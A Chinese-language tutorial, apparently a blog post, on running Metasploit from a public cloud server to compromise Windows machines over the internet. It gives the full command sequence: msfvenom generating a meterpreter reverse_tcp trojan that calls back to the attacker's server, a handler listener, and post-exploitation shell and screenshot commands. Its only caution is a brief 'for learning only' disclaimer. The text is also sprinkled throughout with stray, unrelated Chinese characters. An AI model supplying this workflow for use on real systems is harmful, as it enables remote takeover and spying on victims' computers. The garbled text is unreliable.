傻瓜式Metasploit外網(wǎng)滲透(無需內(nèi)網(wǎng)穿透)

眾所周知,Metasploit 是個(gè)內(nèi)網(wǎng)滲透神器亭畜。

但是內(nèi)網(wǎng)滲透哪有外網(wǎng)刺激,于是筆者上度娘搜索“msf 外網(wǎng)”贱案。

搜索結(jié)果的話,

首先侨糟,虛擬機(jī)里的kali不能滲透到外網(wǎng)的原因是它沒有外網(wǎng)IP瘩燥。

所以大多數(shù)都是用內(nèi)網(wǎng)穿透工具,還有一部分是通過服務(wù)器做個(gè)frp代理厉膀。

本質(zhì)其實(shí)都一樣二拐。但是親測(cè)后者比較有用。

可百新!是庐扫!

第二個(gè)方法有一個(gè)特點(diǎn),就是很煩形庭。

買好服務(wù)器之后再下載frp,服務(wù)器上下載完之后還得在Kali上面下斟珊。下載完天都黑了富纸,還得改這個(gè)改那個(gè)。最后一堆ip還搞來搞去胜嗓。

于是筆者就想到了。

既然都有服務(wù)器了辞州,為啥不直接在服務(wù)器上安裝msf呢?埃元?媚狰?非得繞這么大圈子?崭孤??

你需要這些東西

·一臺(tái)能用ssh的電腦(本文以 Mac 為例)

·一臺(tái) Linux 云服務(wù)器/云主機(jī)/ECS/VPS(名字不同辨宠,實(shí)質(zhì)一樣,不過不是虛擬主機(jī)哦)(本文以 Debian 10 系統(tǒng)為例)(現(xiàn)在市面上的那種免費(fèi)云主機(jī)就能用了)

·一臺(tái)沒開殺毒軟件的 Windows 電腦(虛擬機(jī))(本文以 XP SP3 為例)

安裝 msf

(msf就是 Metasploit Framework 的簡(jiǎn)稱)

首先你需要用ssh連上你的服務(wù)器精偿。具體步驟我就不贅述了,可以自行百度搔预,服務(wù)器提供商應(yīng)該也有教程提供。

用以下命令下載msf的安裝包拯田。

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

將其設(shè)為可執(zhí)行文件扶叉。

chmod +x msfinstall

運(yùn)行安裝包帕膜。

./msfinstall

初始化數(shù)據(jù)庫

msfdb init

(運(yùn)行到這里筆者的服務(wù)器報(bào)錯(cuò)說在root用戶下不能運(yùn)行這個(gè)命令,所以我就直接略過初始化數(shù)據(jù)庫了垮刹,其實(shí)不運(yùn)行這個(gè)命令貌似也不會(huì)有什么問題)

然后你的服務(wù)器上就已經(jīng)安裝好了msf。

配置寶塔面板

因?yàn)檫@是服務(wù)器酪劫,不是虛擬機(jī)寺董。上傳下載文件非常不方便。所以我們這里安裝一個(gè)寶塔面板遮咖。

這是官方教程

wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && bash install.sh

安裝完之后,復(fù)制終端給的鏈接麦箍,進(jìn)入面板。

它會(huì)跳出來讓你推薦安裝的東西挟裂。我們這里先不用安裝揍诽。

生成木馬

我們回到終端,運(yùn)行下面的命令生成木馬渠啤。

msfvenom -p windows/meterpreter/reverse_tcp lhost=(你的服務(wù)器外網(wǎng)ip) lport=(隨便取個(gè)端口號(hào)) -f exe > /root/(木馬文件名).exe


-p 設(shè)置payload,無需改動(dòng)

lhost 監(jiān)聽IP饵筑,此處填你服務(wù)器的外網(wǎng)IP(一定要外網(wǎng)ip,不然目標(biāo)機(jī)器找不到你架专。比如你家住在xx市xx路xx號(hào)xx室,你某寶買東西就填xx室部脚,誰找得到你啊喂。)

lport 監(jiān)聽端口委刘,這里隨便寫一個(gè),最好是4位數(shù)呕童,而且沒有規(guī)律的那種淆珊。不然端口已經(jīng)可能被占用了。

-f 生成文件的格式 > 文件放置的目錄和文件名 (一般放在root目錄下即可)


比如你的服務(wù)器外網(wǎng)ip是 某某某.某某某.某某某.某某某

端口想選 1086

木馬文件放在 /root/iammuma.exe

你就應(yīng)該運(yùn)行

msfvenom -p windows/meterpreter/reverse_tcp lhost= 某某某.某某某.某某某.某某某 lport=1086 -f exe > /root/iammuma.exe



木馬生成成功

開放端口/下載木馬

這時(shí)候往声,我們就需要用到寶塔面板了戳吝。

開放端口

點(diǎn)擊左側(cè)菜單中的 安全听哭。

增加一個(gè)放行端口。

端口填上面的你選的且警。

備注/說明隨便寫礁遣。

下載木馬

點(diǎn)擊左側(cè)菜單中的 文件

寶塔面板文件

再點(diǎn)擊根目錄祟霍。


根目錄

再點(diǎn)擊進(jìn)入root文件夾沸呐。


root文件夾

我們可以看到醇王,木馬已經(jīng)生成了。

點(diǎn)擊下載崭添,然后拖入 Windows 虛擬機(jī)中寓娩。


木馬在虛擬機(jī)中

先別急著運(yùn)行木馬。

開始監(jiān)聽

你需要把msf的監(jiān)聽打開,才能檢測(cè)到木馬返回的數(shù)據(jù)棘伴。

第一次寞埠,我設(shè)置lhost為127.0.0.1。

127.0.0.1是回送地址焊夸,指本地機(jī)仁连,一般用來測(cè)試使用≮逅耄——百度百科

結(jié)果

用127.0.0.1

在虛擬機(jī)狂點(diǎn)木馬也沒反應(yīng)饭冬。

于是我改用外網(wǎng)IP。

于是就成功了揪阶。hhhhh慶祝一下昌抠。


成功

(看到meterpreter就是成功了,目標(biāo)機(jī)基本上就已經(jīng)被你掌握在手里了)



步驟:

1 進(jìn)入msf

msfconsole


2 加載監(jiān)聽模塊

use exploit/multi/handler


3 設(shè)置payload遣钳,要和木馬設(shè)置的payload相同扰魂,如果你是按照上文來的話就不用修改蕴茴。

set payload windows/meterpreter/reverse_tcp


4 設(shè)置監(jiān)聽ip环鲤,就是你的服務(wù)器外網(wǎng)ip

set lhost (服務(wù)器外網(wǎng)IP)


5 設(shè)置端口愿棋,lport后面的數(shù)字就是你之前設(shè)置的端口。如果你是按照上文來的話就也不用修改垮庐。

set lport 1086


6 開始監(jiān)聽

run


7 在虛擬機(jī)里點(diǎn)擊木馬。

(如果點(diǎn)一次不行就多點(diǎn)幾次浙于。一定要關(guān)掉殺毒軟件!2翁选筒溃!等10秒左右一般都能有了)

搞定之后

這里就寫一下 meterpreter 的一些基本操作。

shell

這個(gè)命令就可以用目標(biāo)機(jī)的cmd控制目標(biāo)機(jī)滥崩。



screenshot


截圖

這個(gè)命令就可以給目標(biāo)機(jī)截圖擎值。

我們可以在寶塔面板里找到截下來的圖片厕氨。


寶塔面板里的截圖

總結(jié)

總的來說,就是在服務(wù)器上生成木馬并監(jiān)聽踢涌,并且用寶塔面板開啟端口并下載木馬文件潘明,最后在 Windows 上運(yùn)行木馬。

本教程僅供學(xué)習(xí)用,嚴(yán)禁用于非法用途。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末更耻,一起剝皮案震驚了整個(gè)濱河市锯七,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌疼阔,老刑警劉巖茵典,帶你破解...
    沈念sama閱讀 218,941評(píng)論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件麻献,死亡現(xiàn)場(chǎng)離奇詭異猜扮,居然都是意外死亡源譬,警方通過查閱死者的電腦和手機(jī)踩娘,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,397評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人柬脸,你說我怎么就攤上這事鲜结≌乖耍” “怎么了活逆?”我有些...
    開封第一講書人閱讀 165,345評(píng)論 0 356
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)拗胜。 經(jīng)常有香客問我蔗候,道長(zhǎng),這世上最難降的妖魔是什么埂软? 我笑而不...
    開封第一講書人閱讀 58,851評(píng)論 1 295
  • 正文 為了忘掉前任锈遥,我火速辦了婚禮,結(jié)果婚禮上勘畔,老公的妹妹穿的比我還像新娘所灸。我一直安慰自己,他們只是感情好炫七,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,868評(píng)論 6 392
  • 文/花漫 我一把揭開白布爬立。 她就那樣靜靜地躺著,像睡著了一般万哪。 火紅的嫁衣襯著肌膚如雪侠驯。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,688評(píng)論 1 305
  • 那天壤圃,我揣著相機(jī)與錄音陵霉,去河邊找鬼。 笑死伍绳,一個(gè)胖子當(dāng)著我的面吹牛踊挠,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播冲杀,決...
    沈念sama閱讀 40,414評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼效床,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來了权谁?” 一聲冷哼從身側(cè)響起剩檀,我...
    開封第一講書人閱讀 39,319評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎旺芽,沒想到半個(gè)月后沪猴,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,775評(píng)論 1 315
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡采章,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,945評(píng)論 3 336
  • 正文 我和宋清朗相戀三年运嗜,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片悯舟。...
    茶點(diǎn)故事閱讀 40,096評(píng)論 1 350
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡担租,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出抵怎,到底是詐尸還是另有隱情奋救,我是刑警寧澤岭参,帶...
    沈念sama閱讀 35,789評(píng)論 5 346
  • 正文 年R本政府宣布,位于F島的核電站尝艘,受9級(jí)特大地震影響演侯,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜利耍,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,437評(píng)論 3 331
  • 文/蒙蒙 一蚌本、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧隘梨,春花似錦程癌、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,993評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至捻脖,卻和暖如春锐峭,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背可婶。 一陣腳步聲響...
    開封第一講書人閱讀 33,107評(píng)論 1 271
  • 我被黑心中介騙來泰國打工沿癞, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人矛渴。 一個(gè)月前我還...
    沈念sama閱讀 48,308評(píng)論 3 372
  • 正文 我出身青樓椎扬,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國和親具温。 傳聞我的和親對(duì)象是個(gè)殘疾皇子蚕涤,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,037評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容